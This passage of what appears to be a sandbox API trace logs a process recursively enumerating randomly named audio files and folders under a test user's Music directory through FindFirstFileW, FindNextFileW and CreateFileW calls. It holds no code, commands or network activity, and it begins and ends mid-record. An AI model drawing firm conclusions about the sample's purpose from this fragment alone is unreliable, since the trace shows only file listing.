ftCreationTime.dwHighDateTime=0x1d82476, ftLastAccessTime.dwLowDateTime=0x4e3fc40, ftLastAccessTime.dwHighDateTime=0x1d8271b, ftLastWriteTime.dwLowDateTime=0x4e3fc40, ftLastWriteTime.dwHighDateTime=0x1d8271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="KcRwHRb9GRYnTCwA", cAlternateFileName="KCRWHR~1")) returned 1 [0256.736] FindNextFileW (in: hFindFile=0x8fe980, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x750b4d40, ftCreationTime.dwHighDateTime=0x1d81b9d, ftLastAccessTime.dwLowDateTime=0x5f4be6f0, ftLastAccessTime.dwHighDateTime=0x1d82097, ftLastWriteTime.dwLowDateTime=0x5f4be6f0, ftLastWriteTime.dwHighDateTime=0x1d82097, nFileSizeHigh=0x0, nFileSizeLow=0x18a20, dwReserved0=0x0, dwReserved1=0x0, cFileName="Qun29tcX.wav", cAlternateFileName="")) returned 1 [0256.736] FindNextFileW (in: hFindFile=0x8fe980, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.738] FindClose (in: hFindFile=0x8fe980 | out: hFindFile=0x8fe980) returned 1 [0256.739] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.739] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\*", lpFindFileData=0x123a34e0 | out: lpFindFileData=0x123a34e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19a8bfa0, ftCreationTime.dwHighDateTime=0x1d82476, ftLastAccessTime.dwLowDateTime=0x4e3fc40, ftLastAccessTime.dwHighDateTime=0x1d8271b, ftLastWriteTime.dwLowDateTime=0x4e3fc40, ftLastWriteTime.dwHighDateTime=0x1d8271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fea80 [0256.740] FindNextFileW (in: hFindFile=0x8fea80, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19a8bfa0, ftCreationTime.dwHighDateTime=0x1d82476, ftLastAccessTime.dwLowDateTime=0x4e3fc40, ftLastAccessTime.dwHighDateTime=0x1d8271b, ftLastWriteTime.dwLowDateTime=0x4e3fc40, ftLastWriteTime.dwHighDateTime=0x1d8271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.740] FindNextFileW (in: hFindFile=0x8fea80, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1180e9b0, ftCreationTime.dwHighDateTime=0x1d82124, ftLastAccessTime.dwLowDateTime=0x73fc5490, ftLastAccessTime.dwHighDateTime=0x1d8214b, ftLastWriteTime.dwLowDateTime=0x73fc5490, ftLastWriteTime.dwHighDateTime=0x1d8214b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="A_ vsPrHANVz-cnbD2", cAlternateFileName="A_VSPR~1")) returned 1 [0256.740] FindNextFileW (in: hFindFile=0x8fea80, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47b4d950, ftCreationTime.dwHighDateTime=0x1d82242, ftLastAccessTime.dwLowDateTime=0x9d82ddd0, ftLastAccessTime.dwHighDateTime=0x1d82825, ftLastWriteTime.dwLowDateTime=0x9d82ddd0, ftLastWriteTime.dwHighDateTime=0x1d82825, nFileSizeHigh=0x0, nFileSizeLow=0x4d6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="cAk2AgPzj.m4a", cAlternateFileName="CAK2AG~1.M4A")) returned 1 [0256.740] FindNextFileW (in: hFindFile=0x8fea80, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e336d30, ftCreationTime.dwHighDateTime=0x1d81ab2, ftLastAccessTime.dwLowDateTime=0xeba25a40, ftLastAccessTime.dwHighDateTime=0x1d82875, ftLastWriteTime.dwLowDateTime=0xeba25a40, ftLastWriteTime.dwHighDateTime=0x1d82875, nFileSizeHigh=0x0, nFileSizeLow=0x107d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cg4wICSJ7X32.mp3", cAlternateFileName="CG4WIC~1.MP3")) returned 1 [0256.740] FindNextFileW (in: hFindFile=0x8fea80, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79df8940, ftCreationTime.dwHighDateTime=0x1d8256f, ftLastAccessTime.dwLowDateTime=0xa69fe7c0, ftLastAccessTime.dwHighDateTime=0x1d8271a, ftLastWriteTime.dwLowDateTime=0xa69fe7c0, ftLastWriteTime.dwHighDateTime=0x1d8271a, nFileSizeHigh=0x0, nFileSizeLow=0x3853, dwReserved0=0x0, dwReserved1=0x0, cFileName="tU0no.m4a", cAlternateFileName="")) returned 1 [0256.740] FindNextFileW (in: hFindFile=0x8fea80, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae57c980, ftCreationTime.dwHighDateTime=0x1d828da, ftLastAccessTime.dwLowDateTime=0x2f464840, ftLastAccessTime.dwHighDateTime=0x1d8294f, ftLastWriteTime.dwLowDateTime=0x2f464840, ftLastWriteTime.dwHighDateTime=0x1d8294f, nFileSizeHigh=0x0, nFileSizeLow=0x8015, dwReserved0=0x0, dwReserved1=0x0, cFileName="uihVSnd7fm.m4a", cAlternateFileName="UIHVSN~1.M4A")) returned 1 [0256.740] FindNextFileW (in: hFindFile=0x8fea80, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4db9f7a0, ftCreationTime.dwHighDateTime=0x1d82426, ftLastAccessTime.dwLowDateTime=0xf199a8a0, ftLastAccessTime.dwHighDateTime=0x1d82545, ftLastWriteTime.dwLowDateTime=0xf199a8a0, ftLastWriteTime.dwHighDateTime=0x1d82545, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="w158lXmEu7fV", cAlternateFileName="W158LX~1")) returned 1 [0256.740] FindNextFileW (in: hFindFile=0x8fea80, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd1ad04f0, ftCreationTime.dwHighDateTime=0x1d82096, ftLastAccessTime.dwLowDateTime=0x9b2e25f0, ftLastAccessTime.dwHighDateTime=0x1d82805, ftLastWriteTime.dwLowDateTime=0x9b2e25f0, ftLastWriteTime.dwHighDateTime=0x1d82805, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Yjsf", cAlternateFileName="")) returned 1 [0256.740] FindNextFileW (in: hFindFile=0x8fea80, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.740] FindClose (in: hFindFile=0x8fea80 | out: hFindFile=0x8fea80) returned 1 [0256.740] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\A_ vsPrHANVz-cnbD2" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\a_ vsprhanvz-cnbd2"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.740] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\A_ vsPrHANVz-cnbD2\\*", lpFindFileData=0x123a33d0 | out: lpFindFileData=0x123a33d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1180e9b0, ftCreationTime.dwHighDateTime=0x1d82124, ftLastAccessTime.dwLowDateTime=0x73fc5490, ftLastAccessTime.dwHighDateTime=0x1d8214b, ftLastWriteTime.dwLowDateTime=0x73fc5490, ftLastWriteTime.dwHighDateTime=0x1d8214b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8feb40 [0256.741] FindNextFileW (in: hFindFile=0x8feb40, lpFindFileData=0x123a3450 | out: lpFindFileData=0x123a3450*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1180e9b0, ftCreationTime.dwHighDateTime=0x1d82124, ftLastAccessTime.dwLowDateTime=0x73fc5490, ftLastAccessTime.dwHighDateTime=0x1d8214b, ftLastWriteTime.dwLowDateTime=0x73fc5490, ftLastWriteTime.dwHighDateTime=0x1d8214b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.741] FindNextFileW (in: hFindFile=0x8feb40, lpFindFileData=0x123a3450 | out: lpFindFileData=0x123a3450*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b67c6d0, ftCreationTime.dwHighDateTime=0x1d822c5, ftLastAccessTime.dwLowDateTime=0x66200980, ftLastAccessTime.dwHighDateTime=0x1d829d8, ftLastWriteTime.dwLowDateTime=0x66200980, ftLastWriteTime.dwHighDateTime=0x1d829d8, nFileSizeHigh=0x0, nFileSizeLow=0x17988, dwReserved0=0x0, dwReserved1=0x0, cFileName="5yOfoWHhdYqKnUlxPol.mp3", cAlternateFileName="5YOFOW~1.MP3")) returned 1 [0256.741] FindNextFileW (in: hFindFile=0x8feb40, lpFindFileData=0x123a3450 | out: lpFindFileData=0x123a3450*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb63cc8b0, ftCreationTime.dwHighDateTime=0x1d8249a, ftLastAccessTime.dwLowDateTime=0x594bff70, ftLastAccessTime.dwHighDateTime=0x1d8298d, ftLastWriteTime.dwLowDateTime=0x594bff70, ftLastWriteTime.dwHighDateTime=0x1d8298d, nFileSizeHigh=0x0, nFileSizeLow=0xedf6, dwReserved0=0x0, dwReserved1=0x0, cFileName="dxPjxFmWasQOiEbDV.wav", cAlternateFileName="DXPJXF~1.WAV")) returned 1 [0256.741] FindNextFileW (in: hFindFile=0x8feb40, lpFindFileData=0x123a3450 | out: lpFindFileData=0x123a3450*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x442b21f0, ftCreationTime.dwHighDateTime=0x1d82656, ftLastAccessTime.dwLowDateTime=0xdee1f0d0, ftLastAccessTime.dwHighDateTime=0x1d826cd, ftLastWriteTime.dwLowDateTime=0xdee1f0d0, ftLastWriteTime.dwHighDateTime=0x1d826cd, nFileSizeHigh=0x0, nFileSizeLow=0x5733, dwReserved0=0x0, dwReserved1=0x0, cFileName="OLa7wRx3.mp3", cAlternateFileName="")) returned 1 [0256.741] FindNextFileW (in: hFindFile=0x8feb40, lpFindFileData=0x123a3450 | out: lpFindFileData=0x123a3450*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.741] FindClose (in: hFindFile=0x8feb40 | out: hFindFile=0x8feb40) returned 1 [0256.742] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.742] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\*", lpFindFileData=0x123a33d0 | out: lpFindFileData=0x123a33d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd1ad04f0, ftCreationTime.dwHighDateTime=0x1d82096, ftLastAccessTime.dwLowDateTime=0x9b2e25f0, ftLastAccessTime.dwHighDateTime=0x1d82805, ftLastWriteTime.dwLowDateTime=0x9b2e25f0, ftLastWriteTime.dwHighDateTime=0x1d82805, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fed80 [0256.742] FindNextFileW (in: hFindFile=0x8fed80, lpFindFileData=0x123a3450 | out: lpFindFileData=0x123a3450*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd1ad04f0, ftCreationTime.dwHighDateTime=0x1d82096, ftLastAccessTime.dwLowDateTime=0x9b2e25f0, ftLastAccessTime.dwHighDateTime=0x1d82805, ftLastWriteTime.dwLowDateTime=0x9b2e25f0, ftLastWriteTime.dwHighDateTime=0x1d82805, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.742] FindNextFileW (in: hFindFile=0x8fed80, lpFindFileData=0x123a3450 | out: lpFindFileData=0x123a3450*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13b7b7e0, ftCreationTime.dwHighDateTime=0x1d821c9, ftLastAccessTime.dwLowDateTime=0xd7db4330, ftLastAccessTime.dwHighDateTime=0x1d82769, ftLastWriteTime.dwLowDateTime=0xd7db4330, ftLastWriteTime.dwHighDateTime=0x1d82769, nFileSizeHigh=0x0, nFileSizeLow=0x5f12, dwReserved0=0x0, dwReserved1=0x0, cFileName="IcIyvO_b9I-.wav", cAlternateFileName="ICIYVO~1.WAV")) returned 1 [0256.742] FindNextFileW (in: hFindFile=0x8fed80, lpFindFileData=0x123a3450 | out: lpFindFileData=0x123a3450*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb17fe500, ftCreationTime.dwHighDateTime=0x1d81b67, ftLastAccessTime.dwLowDateTime=0xd5cb9280, ftLastAccessTime.dwHighDateTime=0x1d82768, ftLastWriteTime.dwLowDateTime=0xd5cb9280, ftLastWriteTime.dwHighDateTime=0x1d82768, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jvLuJscJOug", cAlternateFileName="JVLUJS~1")) returned 1 [0256.742] FindNextFileW (in: hFindFile=0x8fed80, lpFindFileData=0x123a3450 | out: lpFindFileData=0x123a3450*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.743] FindClose (in: hFindFile=0x8fed80 | out: hFindFile=0x8fed80) returned 1 [0256.743] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.743] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\*", lpFindFileData=0x123a32c0 | out: lpFindFileData=0x123a32c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb17fe500, ftCreationTime.dwHighDateTime=0x1d81b67, ftLastAccessTime.dwLowDateTime=0xd5cb9280, ftLastAccessTime.dwHighDateTime=0x1d82768, ftLastWriteTime.dwLowDateTime=0xd5cb9280, ftLastWriteTime.dwHighDateTime=0x1d82768, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fed40 [0256.743] FindNextFileW (in: hFindFile=0x8fed40, lpFindFileData=0x123a3340 | out: lpFindFileData=0x123a3340*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb17fe500, ftCreationTime.dwHighDateTime=0x1d81b67, ftLastAccessTime.dwLowDateTime=0xd5cb9280, ftLastAccessTime.dwHighDateTime=0x1d82768, ftLastWriteTime.dwLowDateTime=0xd5cb9280, ftLastWriteTime.dwHighDateTime=0x1d82768, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.743] FindNextFileW (in: hFindFile=0x8fed40, lpFindFileData=0x123a3340 | out: lpFindFileData=0x123a3340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf434c550, ftCreationTime.dwHighDateTime=0x1d82265, ftLastAccessTime.dwLowDateTime=0x556f4550, ftLastAccessTime.dwHighDateTime=0x1d825ba, ftLastWriteTime.dwLowDateTime=0x556f4550, ftLastWriteTime.dwHighDateTime=0x1d825ba, nFileSizeHigh=0x0, nFileSizeLow=0x6638, dwReserved0=0x0, dwReserved1=0x0, cFileName="6GLhCUHar.mp3", cAlternateFileName="6GLHCU~1.MP3")) returned 1 [0256.743] FindNextFileW (in: hFindFile=0x8fed40, lpFindFileData=0x123a3340 | out: lpFindFileData=0x123a3340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d040d00, ftCreationTime.dwHighDateTime=0x1d823bc, ftLastAccessTime.dwLowDateTime=0x2365fdd0, ftLastAccessTime.dwHighDateTime=0x1d82824, ftLastWriteTime.dwLowDateTime=0x2365fdd0, ftLastWriteTime.dwHighDateTime=0x1d82824, nFileSizeHigh=0x0, nFileSizeLow=0x10d3f, dwReserved0=0x0, dwReserved1=0x0, cFileName="7mm1j-VAYXO_h.mp3", cAlternateFileName="7MM1J-~1.MP3")) returned 1 [0256.743] FindNextFileW (in: hFindFile=0x8fed40, lpFindFileData=0x123a3340 | out: lpFindFileData=0x123a3340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2696ab70, ftCreationTime.dwHighDateTime=0x1d81efc, ftLastAccessTime.dwLowDateTime=0x839fd0b0, ftLastAccessTime.dwHighDateTime=0x1d826d8, ftLastWriteTime.dwLowDateTime=0x839fd0b0, ftLastWriteTime.dwHighDateTime=0x1d826d8, nFileSizeHigh=0x0, nFileSizeLow=0x4985, dwReserved0=0x0, dwReserved1=0x0, cFileName="8261.mp3", cAlternateFileName="")) returned 1 [0256.744] FindNextFileW (in: hFindFile=0x8fed40, lpFindFileData=0x123a3340 | out: lpFindFileData=0x123a3340*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa47c0da0, ftCreationTime.dwHighDateTime=0x1d81af6, ftLastAccessTime.dwLowDateTime=0x9a4a0eb0, ftLastAccessTime.dwHighDateTime=0x1d81e19, ftLastWriteTime.dwLowDateTime=0x9a4a0eb0, ftLastWriteTime.dwHighDateTime=0x1d81e19, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pqkT0R1dikE", cAlternateFileName="PQKT0R~1")) returned 1 [0256.744] FindNextFileW (in: hFindFile=0x8fed40, lpFindFileData=0x123a3340 | out: lpFindFileData=0x123a3340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9abceec0, ftCreationTime.dwHighDateTime=0x1d81bea, ftLastAccessTime.dwLowDateTime=0xcce6e960, ftLastAccessTime.dwHighDateTime=0x1d82841, ftLastWriteTime.dwLowDateTime=0xcce6e960, ftLastWriteTime.dwHighDateTime=0x1d82841, nFileSizeHigh=0x0, nFileSizeLow=0x6cb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ugt1JCzkxaPy9Jv7K.m4a", cAlternateFileName="UGT1JC~1.M4A")) returned 1 [0256.744] FindNextFileW (in: hFindFile=0x8fed40, lpFindFileData=0x123a3340 | out: lpFindFileData=0x123a3340*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e6e3de0, ftCreationTime.dwHighDateTime=0x1d819c9, ftLastAccessTime.dwLowDateTime=0xf1d803e0, ftLastAccessTime.dwHighDateTime=0x1d81fe4, ftLastWriteTime.dwLowDateTime=0xf1d803e0, ftLastWriteTime.dwHighDateTime=0x1d81fe4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZvLJyDLOgo", cAlternateFileName="ZVLJYD~1")) returned 1 [0256.744] FindNextFileW (in: hFindFile=0x8fed40, lpFindFileData=0x123a3340 | out: lpFindFileData=0x123a3340*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.744] FindClose (in: hFindFile=0x8fed40 | out: hFindFile=0x8fed40) returned 1 [0256.745] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\ZvLJyDLOgo" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\zvljydlogo"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.745] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\ZvLJyDLOgo\\*", lpFindFileData=0x123a31b0 | out: lpFindFileData=0x123a31b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e6e3de0, ftCreationTime.dwHighDateTime=0x1d819c9, ftLastAccessTime.dwLowDateTime=0xf1d803e0, ftLastAccessTime.dwHighDateTime=0x1d81fe4, ftLastWriteTime.dwLowDateTime=0xf1d803e0, ftLastWriteTime.dwHighDateTime=0x1d81fe4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fe980 [0256.745] FindNextFileW (in: hFindFile=0x8fe980, lpFindFileData=0x123a3230 | out: lpFindFileData=0x123a3230*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e6e3de0, ftCreationTime.dwHighDateTime=0x1d819c9, ftLastAccessTime.dwLowDateTime=0xf1d803e0, ftLastAccessTime.dwHighDateTime=0x1d81fe4, ftLastWriteTime.dwLowDateTime=0xf1d803e0, ftLastWriteTime.dwHighDateTime=0x1d81fe4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.745] FindNextFileW (in: hFindFile=0x8fe980, lpFindFileData=0x123a3230 | out: lpFindFileData=0x123a3230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e0d7e50, ftCreationTime.dwHighDateTime=0x1d826b0, ftLastAccessTime.dwLowDateTime=0xebf82cf0, ftLastAccessTime.dwHighDateTime=0x1d82829, ftLastWriteTime.dwLowDateTime=0xebf82cf0, ftLastWriteTime.dwHighDateTime=0x1d82829, nFileSizeHigh=0x0, nFileSizeLow=0x8e53, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSD694aanoxL5K1oU2.m4a", cAlternateFileName="RSD694~1.M4A")) returned 1 [0256.745] FindNextFileW (in: hFindFile=0x8fe980, lpFindFileData=0x123a3230 | out: lpFindFileData=0x123a3230*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6a30110, ftCreationTime.dwHighDateTime=0x1d821b3, ftLastAccessTime.dwLowDateTime=0xc6e0c910, ftLastAccessTime.dwHighDateTime=0x1d82a20, ftLastWriteTime.dwLowDateTime=0xc6e0c910, ftLastWriteTime.dwHighDateTime=0x1d82a20, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="YibDx1iNotnzBWQf", cAlternateFileName="YIBDX1~1")) returned 1 [0256.745] FindNextFileW (in: hFindFile=0x8fe980, lpFindFileData=0x123a3230 | out: lpFindFileData=0x123a3230*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.745] FindClose (in: hFindFile=0x8fe980 | out: hFindFile=0x8fe980) returned 1 [0256.746] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\ZvLJyDLOgo\\YibDx1iNotnzBWQf" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\zvljydlogo\\yibdx1inotnzbwqf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.746] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\ZvLJyDLOgo\\YibDx1iNotnzBWQf\\*", lpFindFileData=0x123a30a0 | out: lpFindFileData=0x123a30a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6a30110, ftCreationTime.dwHighDateTime=0x1d821b3, ftLastAccessTime.dwLowDateTime=0xc6e0c910, ftLastAccessTime.dwHighDateTime=0x1d82a20, ftLastWriteTime.dwLowDateTime=0xc6e0c910, ftLastWriteTime.dwHighDateTime=0x1d82a20, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fe940 [0256.746] FindNextFileW (in: hFindFile=0x8fe940, lpFindFileData=0x123a3120 | out: lpFindFileData=0x123a3120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6a30110, ftCreationTime.dwHighDateTime=0x1d821b3, ftLastAccessTime.dwLowDateTime=0xc6e0c910, ftLastAccessTime.dwHighDateTime=0x1d82a20, ftLastWriteTime.dwLowDateTime=0xc6e0c910, ftLastWriteTime.dwHighDateTime=0x1d82a20, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.746] FindNextFileW (in: hFindFile=0x8fe940, lpFindFileData=0x123a3120 | out: lpFindFileData=0x123a3120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6aca7b40, ftCreationTime.dwHighDateTime=0x1d823e4, ftLastAccessTime.dwLowDateTime=0x2109d9f0, 